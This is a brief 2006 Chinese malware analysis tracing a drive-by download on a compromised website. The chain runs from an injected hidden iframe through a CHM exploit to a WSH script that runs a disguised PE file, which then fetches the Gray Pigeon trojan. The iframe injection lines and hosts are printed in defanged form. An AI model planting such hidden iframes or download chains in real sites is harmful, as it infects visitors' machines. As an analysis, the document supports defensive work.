一个自动下载灰鸽子的网站

endurer　原创

2006-05-04　第1版

某网站被加入：

＜iframe src="hxxp://95762.***512j.com/" width="0" height="0"＞

hxxp://95762.***512j.com/index的内容为:

＜iframe src="hxxp://www.***kkkshop.com/images/index.htm" width="0" height="0"＞＜/iframe＞

hxxp://www.***kkkshop.com/images/index.htm的内容为:

＜iframe src="hxxp://www.***kkkshop.com/cnshop/img/index.htm" width="0" height="0"＞＜/iframe＞

hxxp://www.***kkkshop.com/cnshop/img/index.htm的内容为escope()的代码，利用CHM漏洞下载young.gif和young.css两个文件。

young.gif　利用WSH在IE临时缓存中寻找young.css，复制为C:/arcldrer.exe并运行；创建c:/cmd.bat来清除痕迹。

young.css　是个PE格式的文件，会下载hxxp://www.***huayimei.com/bbs/Images/manage/zone.exe，存为C:/Program Files/zone.exe。这个是灰鸽子。

瑞星将young.css报为Trojan.DL.Delf.it。

本文来自互联网用户投稿，文章观点仅代表作者本人，不代表本站立场，不承担相关法律责任。如若转载，请注明出处。 如若内容造成侵权/违法违规/事实不符，请点击【内容举报】进行投诉反馈！